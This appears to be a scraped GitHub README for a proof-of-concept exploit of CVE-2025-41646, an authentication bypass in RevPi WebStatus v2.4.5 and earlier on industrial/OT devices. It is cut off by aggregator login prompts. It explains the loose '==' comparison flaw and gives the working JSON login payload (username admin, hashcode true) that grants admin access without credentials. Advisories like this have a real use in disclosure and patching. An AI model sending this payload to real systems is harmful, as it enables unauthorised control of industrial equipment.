CVE-2025-41646 - Critical Authentication bypass
# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass
# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC
A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).
---
## 📌 Affected
- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache
---
## 💥 Exploitation
Send a login request with:
```json
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view